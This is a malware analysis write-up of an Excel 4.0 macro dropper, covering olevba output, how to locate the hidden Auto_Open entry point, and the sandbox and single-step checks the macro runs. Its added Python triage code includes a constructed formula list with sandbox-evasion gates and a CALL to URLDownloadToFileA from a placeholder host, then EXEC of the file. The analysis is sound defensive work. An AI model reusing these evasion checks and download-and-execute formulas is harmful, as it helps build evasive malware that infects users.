Reverse Engineering - Sample Analysis - Microsoft Excel 4.0 - 3fb082368a8062316976fdfeeceae130d98a3247



References:
https://github.com/decalage2/oletools

XLS

$ trid 088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9
    Collecting data from file: 088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9
        80.2% (.XLS) Microsoft Excel sheet (32500/1/3)
        19.7% (.) Generic OLE2 / Multistream Compound File (8000/1)

Excel 4.0 Macros

$ strings 088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9 | grep -i excel
    Microsoft Excel
    Excel 4.0 Macros
    Microsoft Excel 2003 Worksheet
    Excel.Sheet.8
    Microsoft Excel

Auto_Open

$ python ./olevba.py ../../088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9
    olevba 0.56.1.dev2 on Python 2.7.16 - http://decalage.info/python/oletools
    ===============================================================================
    FILE: ../../088c3c81e03e959c0c596979135fa972f167e6fea542cf023871775a3dbd0ed9
    Type: OLE
    -------------------------------------------------------------------------------
    VBA MACRO xlm_macro.txt
    in file: xlm_macro - OLE stream: 'xlm_macro'
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet1
    ' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet2
    ' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet1!GA15138
    ' 002a      2 PRINTHEADERS : Print Row/Column Labels
    ' 00fd     10 LABELSST : Cell Value, String Constant/ SST
    ' 002a      2 PRINTHEADERS : Print Row/Column Labels

P.S. The EntryPoint olevba reports here is wrong. It resolves the Auto_Open name to Sheet1!GA15138, but its own BOUNDSHEET records say Sheet1 is a plain worksheet and Sheet2 is the Excel 4.0 macro sheet, so the real entry point has to be located by hand (below).
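The mismatch above can be caught mechanically. The following Python is an added example (not part of the original notes and not oletools code): it parses the BOUNDSHEET and built-in-name lines exactly as olevba printed them on this page, and flags an Auto_Open target whose sheet is not an Excel 4.0 macro sheet, plus the "hidden" attribute that explains why the name does not show up in Name Manager. The regexes are written against this dump's line format and are an assumption about other olevba versions.

```python
import re

# The olevba "xlm_macro" stream lines from this page, verbatim minus the leading "' ".
OLEVBA_DUMP = """\
0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet1
0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet2
0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet1!GA15138
002a      2 PRINTHEADERS : Print Row/Column Labels
00fd     10 LABELSST : Cell Value, String Constant/ SST
"""

# Line shapes assumed from the dump above (olevba 0.56.x style).
BOUNDSHEET_RE = re.compile(
    r"BOUNDSHEET : Sheet Information - (?P<kind>.+?), (?P<vis>\w+) - (?P<name>\S+)"
)
AUTO_OPEN_RE = re.compile(
    r"built-in-name 1 Auto_Open (?P<hidden>hidden )?len=\d+ ptgRef3d (?P<sheet>[^!]+)!(?P<cell>[A-Z]+\d+)"
)


def parse_sheets(dump):
    """Map sheet name -> (sheet kind, visibility) from the BOUNDSHEET records."""
    return {
        m.group("name"): (m.group("kind"), m.group("vis"))
        for m in BOUNDSHEET_RE.finditer(dump)
    }


def parse_auto_open(dump):
    """Return (sheet, cell, is_hidden) for the Auto_Open built-in name, or None."""
    m = AUTO_OPEN_RE.search(dump)
    if not m:
        return None
    return m.group("sheet"), m.group("cell"), m.group("hidden") is not None


def check_entry_point(dump):
    """Cross-check the Auto_Open target against the sheet types.

    Returns a list of findings; an empty list means the reported entry point
    is at least plausible (it lands on a macro sheet and is not hidden).
    """
    findings = []
    sheets = parse_sheets(dump)
    macro_sheets = [n for n, (kind, _) in sheets.items() if "macro sheet" in kind]
    if not macro_sheets:
        findings.append("no Excel 4.0 macro sheet in BOUNDSHEET records")

    target = parse_auto_open(dump)
    if target is None:
        findings.append("no Auto_Open built-in name found")
        return findings
    sheet, cell, hidden = target
    if hidden:
        findings.append("Auto_Open is a hidden name: it will not appear in Name Manager")
    kind = sheets.get(sheet, ("unknown sheet",))[0]
    if "macro sheet" not in kind:
        findings.append(
            f"Auto_Open -> {sheet}!{cell}, but {sheet} is '{kind}'; "
            f"candidate macro sheet(s): {', '.join(macro_sheets) or 'none'}"
        )
    return findings


if __name__ == "__main__":
    for line in check_entry_point(OLEVBA_DUMP):
        print("finding:", line)
```

Run against this page's dump it reports two findings: the name is hidden, and the Auto_Open reference points at a sheet that is not the macro sheet, which is exactly the condition that sends the analyst to the manual stepping procedure that follows.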

Disable macros, then open the file again


Formulas => Name Manager

P.S. No EntryPoint is listed. Auto_Open is a hidden name (olevba flagged it as hidden above), so Name Manager does not show it.

Search


Take a snapshot first, then Replace All with ALERT; whichever ALERT fires first reveals the EntryPoint location.


Enable macros


EntryPoint: Sheet2!FA15138


After reverting, modify Sheet2!FA15138


Press Halt


Change the cell back to its original formula, then right-click


Step Into


Start single-stepping with Evaluate


APP.MAXIMIZE: Maximizes the Microsoft Excel application window

The macro then probes its environment with GET.WINDOW and GET.WORKSPACE. The type_num values met while stepping, with their meaning from the Excel 4.0 macro function reference, are:

GET.WINDOW(7): If window is hidden, returns TRUE; otherwise, returns FALSE.

GET.WINDOW(20): If window is maximized, returns TRUE; otherwise, returns FALSE.

GET.WINDOW(23): Number indicating the size of the window (including charts): 1 = Restored, 2 = Minimized (displayed as an icon), 3 = Maximized

GET.WORKSPACE(31): If a currently running macro is in single step mode, returns TRUE; otherwise, returns FALSE. (This one is aimed directly at the Step Into / Evaluate procedure above.)

GET.WORKSPACE(13): Usable workspace width, in points.

GET.WORKSPACE(14): Usable workspace height, in points.

GET.WORKSPACE(19): If a mouse is present, returns TRUE; otherwise, returns FALSE. In Microsoft Excel for the Macintosh, always returns TRUE.

GET.WORKSPACE(42): If your computer is capable of playing sounds, returns TRUE; otherwise, returns FALSE.

GET.WORKSPACE(1): Name of the environment in which Microsoft Excel is running, as text, followed by the environment's version number.

Export Registry

Registry Path

GET.WORKSPACE(2): The version number of Microsoft Excel, as text (for example, "5.0").

The exported registry is used for a further decision on whether to continue.

Download the payload and execute it
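The environment checks and the final download-and-execute stage above are the two things worth triaging automatically before stepping a macro sheet by hand. The Python below is an added example, not code from the original notes: it scans a list of macro-sheet formulas (as copied out of the cells, or out of an olevba formula dump), maps every GET.WORKSPACE / GET.WINDOW type_num to its meaning using the table this page walks through, and reports whether the macro gates on sandbox or debugger indicators and whether it reaches a CALL / EXEC / REGISTER primitive. The SAMPLE_FORMULAS list is constructed to mirror the shape of the checks seen here; it is not the analysed file's cells, and the URLDownloadToFileA CALL is an assumed download pattern, since the page does not show which API this sample used.

```python
import re

# Meaning of the type_num values this page walks through, from the Excel 4.0
# macro function reference. GET.WORKSPACE and GET.WINDOW are separate functions
# with separate numbering; the page lists both kinds.
GET_WORKSPACE = {
    1: "environment name and version",
    2: "Excel version",
    13: "usable workspace width (points)",
    14: "usable workspace height (points)",
    19: "mouse present",
    31: "macro running in single-step mode",
    42: "sound capable",
}
GET_WINDOW = {
    7: "window hidden",
    20: "window maximized",
    23: "window size (1 restored, 2 minimized, 3 maximized)",
}

# Checks whose result only differs in a sandbox, headless VM or debugger session.
ANALYSIS_GATES = {
    ("WORKSPACE", 13), ("WORKSPACE", 14), ("WORKSPACE", 19),
    ("WORKSPACE", 31), ("WORKSPACE", 42), ("WINDOW", 7),
}

CHECK_RE = re.compile(r"GET\.(WORKSPACE|WINDOW)\((\d+)\)")
ACTION_RE = re.compile(r"\b(CALL|REGISTER|EXEC|FOPEN|FWRITE|FORMULA)\(")

# CONSTRUCTED sample of macro-sheet formulas in execution order. They mimic the
# checks on this page; they are not the analysed file's cells, and the CALL/EXEC
# lines are an assumed download-and-run pattern, not what the sample used.
SAMPLE_FORMULAS = [
    '=APP.MAXIMIZE()',
    '=IF(GET.WINDOW(7),CLOSE(TRUE),)',            # hidden window: bail out
    '=IF(GET.WORKSPACE(19),,CLOSE(TRUE))',         # no mouse: bail out
    '=IF(GET.WORKSPACE(42),,CLOSE(TRUE))',         # no sound device: bail out
    '=IF(GET.WORKSPACE(13)<770,CLOSE(TRUE),)',     # tiny workspace: bail out
    '=IF(GET.WORKSPACE(14)<390,CLOSE(TRUE),)',
    '=IF(GET.WORKSPACE(31),CLOSE(TRUE),)',         # being single-stepped: bail out
    '=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))',
    '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/p.bin","C:\\Users\\Public\\p.exe",0,0)',
    '=EXEC("C:\\Users\\Public\\p.exe")',
    '=HALT()',
]


def scan_formulas(formulas):
    """Classify each formula.

    Returns {"env_checks": [(row, func, type_num, description)],
             "actions":    [(row, function_name)]}.
    """
    env_checks, actions = [], []
    for row, formula in enumerate(formulas):
        for func, num in CHECK_RE.findall(formula):
            num = int(num)
            table = GET_WORKSPACE if func == "WORKSPACE" else GET_WINDOW
            env_checks.append((row, func, num, table.get(num, "type_num not in table")))
        for name in ACTION_RE.findall(formula):
            actions.append((row, name))
    return {"env_checks": env_checks, "actions": actions}


def verdict(formulas):
    """(gated_on_analysis_indicators, reaches_download_or_exec) for a formula list."""
    result = scan_formulas(formulas)
    gated = any((func, num) in ANALYSIS_GATES for _, func, num, _ in result["env_checks"])
    names = {name for _, name in result["actions"]}
    return gated, bool(names & {"CALL", "EXEC", "REGISTER"})


if __name__ == "__main__":
    for row, func, num, desc in scan_formulas(SAMPLE_FORMULAS)["env_checks"]:
        print(f"row {row}: GET.{func}({num}) -> {desc}")
    print("verdict (gated, downloads/executes):", verdict(SAMPLE_FORMULAS))
```

The practical use is ordering the manual work: every row in env_checks is a cell to watch when stepping with Evaluate (GET.WORKSPACE(31) in particular will be TRUE precisely because you are stepping, so its branch has to be overridden by hand), and the first CALL / EXEC row is where to set the breakpoint before the payload lands.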